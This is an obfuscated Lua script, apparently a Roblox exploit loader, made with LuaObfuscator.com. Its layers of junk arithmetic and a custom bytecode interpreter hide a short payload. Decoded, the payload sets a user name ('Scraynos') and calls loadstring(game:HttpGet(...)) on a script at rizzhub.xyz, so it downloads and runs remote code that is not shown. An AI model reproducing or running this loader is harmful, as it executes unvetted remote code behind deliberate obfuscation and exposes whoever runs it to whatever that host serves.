--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=0;local v76;while true do if (0==v75) then v76=v2(v0(v30,16));if v19 then local v96=v5(v76,v19);v19=nil;return v96;else return v76;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v77=(v31/((1 + 1 + 0)^(v32-(1 + 0))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v77-(v77%((4476 -3113) -(759 + 603))) ;else local v78=2^(v32-(1347 -(7 + (2005 -(535 + 131))))) ;return (((v31%(v78 + v78))>=v78) and (1847 -(1150 + 696))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(1496 -(1354 + 141))) then return (v37 * (663 -407)) + v36 ;end if (v35==((2599 -(534 + 981)) -(513 + 571))) then v36,v37=v1(v16,v18,v18 + 2 + 0 + 0 );v18=v18 + 2 + 0 ;v35=(1504 -850) -(498 + 155) ;end end end local function v23()local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(713 -(672 + 40))) then return (v42 * (2600745 + 7548990 + 6627481)) + (v41 * (45237 + 20299)) + (v40 * (597 -341)) + v39 ;end if ((0 + 0)==v38) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (1520 -(1227 + 289)) ;v38=1;end end end local function v24()local v43=362 -(219 + 143) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 + (1679 -(1645 + 34)))) then v46=1 + 0 ;v47=(v20(v45,553 -(523 + 29) ,30 -10 ) * (((1336 -(768 + 566)) + 0)^(50 -18))) + v44 ;v43=3 -1 ;end if ((0 -0)==v43) then v44=v23();v45=v23();v43=35 -(29 + 5) ;end if (v43==(1 + 2)) then if (v48==(0 + 0 + (100 -(53 + 47)))) then if (v47==(0 + 0)) then return v49 * (722 -(167 + 555)) ;else local v97=743 -(22 + 396 + 325) ;while true do if (v97==(1237 -(957 + 280))) then v48=(1113 -(264 + 584)) -(208 + 56) ;v46=0 -0 ;break;end end end elseif (v48==2047) then return ((v47==0) and (v49 * (((1087 -(1057 + 29)) + 0)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-1023 ) * (v46 + (v47/((5 -3)^(39 + 13)))) ;end if (v43==2) then v48=v20(v45,21,1874 -(1327 + (2098 -(9 + 1573))) );v49=((v20(v45,2 + 8 + 22 )==(1 + 0)) and  -(409 -((267 -(193 + 23)) + 357))) or (4 -3) ;v43=14 -11 ;end end end local function v25(v50)local v51;if  not v50 then local v79=(0 -0) + 0 ;while true do if (v79==(0 + 0)) then v50=v23();if (v50==(1944 -(984 + 960))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;local v52={};for v67=1033 -(248 + 253 + 531) , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==(1 + 0)) then v56=nil;v57=nil;v53=2 -0 ;end if (v53~=(1640 -(864 + 773))) then else v60=nil;while true do local v80=0;local v81;while true do if (0~=v80) then else v81=0 + 0 ;while true do if ((524 -(198 + 325))==v81) then if ((5 -3)~=v54) then else local v104=0;while true do if (v104~=1) then else for v122=1,v23() do v57[v122]=v23();end return v58;end if (v104~=(0 -0)) then else for v124=448 -(67 + 380) ,v23() do local v125=1232 -(118 + 1114) ;local v126;local v127;while true do if (v125==(0 -0)) then v126=1183 -(757 + 426) ;v127=nil;v125=1961 -(94 + 1866) ;end if (v125==(1783 -(1127 + 655))) then while true do if (v126==(0 -0)) then v127=v21();if (v20(v127,1,145 -(143 + 1) )~=(835 -(437 + 398))) then else local v155=0 + 0 ;local v156;local v157;local v158;local v159;local v160;while true do if (v155==(2 + 0)) then v160=nil;while true do if (v156==(6 -4)) then while true do if ((2 + 0)==v157) then local v171=0;while true do if ((715 -(535 + 179))==v171) then v157=721 -(370 + 348) ;break;end if (v171~=0) then else local v180=0 -0 ;local v181;while true do if (v180==(1033 -(669 + 364))) then v181=0 + 0 ;while true do if (v181==1) then v171=496 -(322 + 173) ;break;end if (v181==(537 -(465 + 72))) then local v184=0;while true do if (v184~=(1807 -(470 + 1336))) then else v181=498 -(436 + 61) ;break;end if (v184==0) then if (v20(v159,818 -(625 + 192) ,1691 -(1106 + 584) )==(1742 -(1676 + 65))) then v160[2]=v60[v160[668 -(37 + 629) ]];end if (v20(v159,2,4 -2 )==(1 + 0)) then v160[1 + 2 ]=v60[v160[1 + 2 ]];end v184=2 -1 ;end end end end break;end end end end end if ((1312 -(988 + 324))~=v157) then else local v172=0;local v173;while true do if (v172==0) then v173=0 + 0 ;while true do if (v173==(670 -(132 + 538))) then local v182=1918 -(1409 + 509) ;while true do if (v182==(0 -0)) then v158=v20(v127,2 -0 ,3);v159=v20(v127,1252 -(1116 + 132) ,13 -7 );v182=758 -(147 + 610) ;end if (v182==(972 -(439 + 532))) then v173=1;break;end end end if ((1 -0)==v173) then v157=1 + 0 ;break;end end break;end end end if (v157~=(3 -2)) then else local v174=0 + 0 ;local v175;while true do if (v174==(0 -0)) then v175=343 -(277 + 66) ;while true do if (v175~=1) then else v157=3 -1 ;break;end if (v175==(0 + 0)) then local v183=0 + 0 ;while true do if (v183==(1438 -(994 + 443))) then v175=1 -0 ;break;end if (v183==(1937 -(767 + 1170))) then v160={v22(),v22(),nil,nil};if (v158==(0 + 0)) then local v185=1413 -(961 + 452) ;local v186;local v187;while true do if (v185~=(0 + 0)) then else local v193=0 + 0 ;while true do if (v193==(3 -2)) then v185=1 + 0 ;break;end if (v193==(593 -(513 + 80))) then v186=0 + 0 ;v187=nil;v193=1;end end end if (v185~=(179 -(55 + 123))) then else while true do if (v186==(0 + 0)) then v187=0;while true do if (v187~=(1676 -(1501 + 175))) then else v160[1538 -(459 + 1076) ]=v22();v160[1843 -(429 + 1410) ]=v22();break;end end break;end end break;end end elseif (v158==(3 -2)) then v160[1986 -(302 + 1681) ]=v23();elseif (v158==2) then v160[1396 -(1032 + 361) ]=v23() -((537 -(125 + 410))^(13 + 3)) ;elseif (v158~=3) then else local v195=0 + 0 ;local v196;local v197;while true do if ((0 + 0)==v195) then v196=0 -0 ;v197=nil;v195=1 -0 ;end if (v195~=1) then else while true do if (v196~=(731 -(322 + 409))) then else v197=0 + 0 ;while true do if (v197==(0 + 0)) then v160[1261 -(624 + 634) ]=v23() -((2 + 0)^(16 + 0)) ;v160[4 + 0 ]=v22();break;end end break;end end break;end end end v183=1227 -(964 + 262) ;end end end end break;end end end if (v157==(2 + 1)) then if (v20(v159,1377 -(1066 + 308) ,3)==(1 + 0)) then v160[3 + 1 ]=v60[v160[828 -(59 + 765) ]];end v55[v124]=v160;break;end end break;end if (v156==1) then local v170=0 + 0 ;while true do if ((0 + 0)==v170) then v159=nil;v160=nil;v170=1 + 0 ;end if (v170==1) then v156=2;break;end end end if (v156~=(0 + 0)) then else v157=919 -(443 + 476) ;v158=nil;v156=1;end end break;end if ((1 + 0)==v155) then v158=nil;v159=nil;v155=796 -(83 + 711) ;end if (v155==0) then v156=0 -0 ;v157=nil;v155=1;end end end break;end end break;end end end for v128=1972 -(791 + 1180) ,v23() do v56[v128-(475 -(405 + 69)) ]=v28();end v104=1;end end end break;end if (v81==(945 -(400 + 545))) then local v103=1887 -(99 + 1788) ;while true do if (v103~=(0 -0)) then else if ((2 -1)==v54) then local v107=535 -(486 + 49) ;while true do if (v107==(728 -(29 + 698))) then for v139=1 + 0 ,v59 do local v140=0;local v141;local v142;local v143;local v144;while true do if (1~=v140) then else v143=nil;v144=nil;v140=6 -4 ;end if (v140==(0 -0)) then v141=0 -0 ;v142=nil;v140=1 + 0 ;end if (v140~=(2 + 0)) then else while true do if (v141==(1388 -(625 + 763))) then local v161=0 -0 ;while true do if (v161==(1218 -(1031 + 186))) then v141=1;break;end if (v161==(0 -0)) then local v166=1209 -(322 + 887) ;while true do if ((1 + 0)==v166) then v161=1 + 0 ;break;end if (v166~=(90 -(61 + 29))) then else v142=0 + 0 ;v143=nil;v166=1013 -(433 + 579) ;end end end end end if (v141~=1) then else v144=nil;while true do if (v142==(2 -1)) then if (v143==1) then v144=v21()~=(0 + 0) ;elseif (v143==(3 -1)) then v144=v24();elseif (v143==3) then v144=v25();end v60[v139]=v144;break;end if (v142==(0 + 0)) then local v168=0 -0 ;local v169;while true do if (v168~=(449 -(192 + 257))) then else v169=0 + 0 ;while true do if (v169~=(4 -3)) then else v142=1 + 0 ;break;end if ((0 + 0)==v169) then local v177=0;while true do if ((687 -(300 + 386))~=v177) then else v169=1;break;end if (v177~=0) then else v143=v21();v144=nil;v177=1;end end end end break;end end end end break;end end break;end end end v58[1 + 2 ]=v21();v107=938 -(144 + 792) ;end if (v107~=(1630 -(984 + 644))) then else v54=1 + 1 ;break;end if (v107~=(0 + 0)) then else v59=v23();v60={};v107=1 + 0 ;end end end if (v54~=0) then else local v108=0;while true do if (0==v108) then v55={};v56={};v108=1 + 0 ;end if (v108~=(1928 -(1492 + 435))) then else v57={};v58={v55,v56,nil,v57};v108=7 -5 ;end if (v108~=(1 + 1)) then else v54=1 + 0 ;break;end end end v103=1635 -(440 + 1194) ;end if (v103==(463 -(283 + 179))) then v81=868 -(600 + 267) ;break;end end end end break;end end end break;end if (v53==(1577 -(1046 + 531))) then v54=0;v55=nil;v53=1126 -(987 + 138) ;end if (v53~=(6 -4)) then else v58=nil;v59=nil;v53=562 -(64 + 495) ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=0;local v70;local v71;local v72;local v73;local v74;while true do if (1==v69) then v72={...};v73=v12("#",...) -1 ;v69=2;end if (v69==3) then A,B=v27(v11(v74));if  not A[1] then local v92=0;local v93;while true do if (v92==0) then v93=v61[4][v70] or "?" ;error("Script error at ["   .. v93   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end if (v69==2) then v74=nil;function v74()local v82=v64;local v83=v65;local v84=v66;local v85=v27;local v86={};local v87={};local v88={};for v94=0,v73 do if ((v94>=v84) or ((3716 -(413 + 1109))>=(4173 + 18))) then v86[v94-v84 ]=v72[v94 + (571 -(52 + 518)) ];else v88[v94]=v72[v94 + (1521 -(1363 + (982 -(63 + 762)))) ];end end local v89=(v73-v84) + 1 ;local v90;local v91;while true do local v95=0;while true do if ((v95==(1 + 0)) or ((6029 -4383)>=4658)) then if ((v91<=(986 -(476 + 507))) or (((5518 + 3144) -(16712 -12578))<1872)) then if ((v91<=(1 + 0)) or ((2387 + (2670 -1641))<=(393 + 744 + 1779))) then if (((5763 -3427)>=((702 -(322 + 11)) + 20)) and (v91>0)) then local v109=1334 -((2500 -(333 + 932)) + 99) ;local v110;local v111;local v112;local v113;while true do if ((v109==(0 -0)) or ((2987 -(823 + 231))>(3060 -949))) then local v137=302 -(280 + 22) ;while true do if ((2157==(2694 -(130 + 407))) and (v137==1)) then v109=1769 -(1051 + 717) ;break;end if ((v137==(354 -(178 + 176))) or ((197 + (933 -677))>=2917)) then v110=v90[3 -1 ];v111,v112=v85(v88[v110](v13(v88,v110 + (2 -1) ,v90[3])));v137=1808 -(173 + 148 + 1486) ;end end end if (((2698 -581)>220) and (v109==1)) then v71=(v112 + v110) -(1 + 0) ;v113=0;v109=701 -(619 + 80) ;end if ((4653<=(732 + 4219)) and (v109==(1806 -(436 + 1368)))) then for v145=v110,v71 do local v146=0;local v147;while true do if ((v146==(0 -0)) or ((577 + 147)==1202)) then v147=0;while true do if ((v147==(250 -(80 + 170))) or (((10610 -(166 + 784)) -6529)<=(2269 -734))) then v113=v113 + 1 + 0 ;v88[v145]=v111[v113];break;end end break;end end end break;end end else v88[v90[5 -3 ]]=v90[7 -4 ]~=(0 + 0) ;end elseif (((2877 + 1028)==(573 + 3332)) and (v91>(4 -(2 + 0)))) then local v115=0 + (865 -(859 + 6)) ;local v116;local v117;while true do if ((v115==((65 -22) -(20 + 23))) or ((921 -(495 + 45))==4470)) then local v138=1196 -(772 + (979 -(241 + 314))) ;while true do if ((4262>(3555 -(361 + 321))) and (v138==(431 -(295 + 135)))) then v115=1794 -(1279 + 514) ;break;end if ((v138==(0 -0)) or ((3380 + 847)<((14424 -6807) -4601))) then v116=0;v117=nil;v138=1 + 0 ;end end end if ((v115==(1 + 0)) or ((1156 -(110 + 141))==(3920 -(1410 + 431)))) then while true do if ((v116==(0 -0)) or ((1205 + 531)==(3346 -2078))) then v117=v90[4 -(754 -(430 + 322)) ];v88[v117]=v88[v117](v13(v88,v117 + (250 -(60 + 189)) ,v71));break;end end break;end end else do return;end end elseif ((v91<=(11 -(936 -(510 + 420)))) or ((2026 + 2178)>4704)) then if (((668 + 1701 + 2127)>=4239) and (v91==(134 -(63 + 67)))) then v88[v90[7 -5 ]]=v90[8 -5 ];else v63[v90[9 -6 ]]=v88[v90[2 + 0 ]];end elseif ((((4963 -2238) + 522)>3077) and (v91<=(4 + 2))) then v88[v90[2 + 0 ]]();elseif ((v91==(2 + (9 -4))) or ((5010 -2035)>(5227 -((1582 -(193 + 1083)) + 1024)))) then local v130=0 -0 ;local v131;local v132;local v133;while true do if ((v130==(1319 -(1256 + 62))) or (483<=(865 -421))) then v133=nil;while true do if ((4250>=(8164 -5871)) and (v131==0)) then local v151=0;while true do if ((v151==((28 + 113) -(82 + 58))) or ((2948 -(100 + 38))<=(5230 -3695))) then v131=1938 -(246 + 487 + 1204) ;break;end if ((((12254 -(344 + 1419)) -7751)>=((1919 -(80 + 135)) + 557)) and (v151==(0 -(0 -0)))) then v132=v90[1 + (929 -(776 + 152)) ];v133=v88[v90[(4 -2) + 1 ]];v151=1 + 0 ;end end end if ((v131==1) or (3285<=(129 -32))) then v88[v132 + (1552 -(1524 + 27)) ]=v133;v88[v132]=v133[v90[15 -11 ]];break;end end break;end if (((14377 -10702)>251) and (v130==(0 + 0))) then v131=0 -0 ;v132=nil;v130=1 + 0 + 0 ;end end else v88[v90[2 -0 ]]=v63[v90[1760 -(191 + 757 + 809) ]];end v70=v70 + (442 -(194 + 247)) ;break;end if ((2749>=1051) and (0==v95)) then local v102=0 -0 ;while true do if ((v102==(0 + (25 -(18 + 7)))) or ((1395 -970)>=738)) then v90=v82[v70];v91=v90[1];v102=1;end if ((4429>(421 + 1418)) and ((4 -3)==v102)) then v95=1 + 0 ;break;end end end end end end v69=3;end if (v69==0) then v70=1;v71= -1;v69=1;end end end;end return v29(v28(),{},v17)(...);end v15("LOL!063O0003083O00557365724E616D6503083O0053637261796E6F73030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C7561000B3O0012043O00023O0012053O00013O0012083O00033O001208000100043O002007000100010005001204000300066O000400014O0001000100044O00035O00022O00063O000100012O00023O00017O000B3O00023O00023O00033O00033O00033O00033O00033O00033O00033O00033O00043O00",v9(),...);end
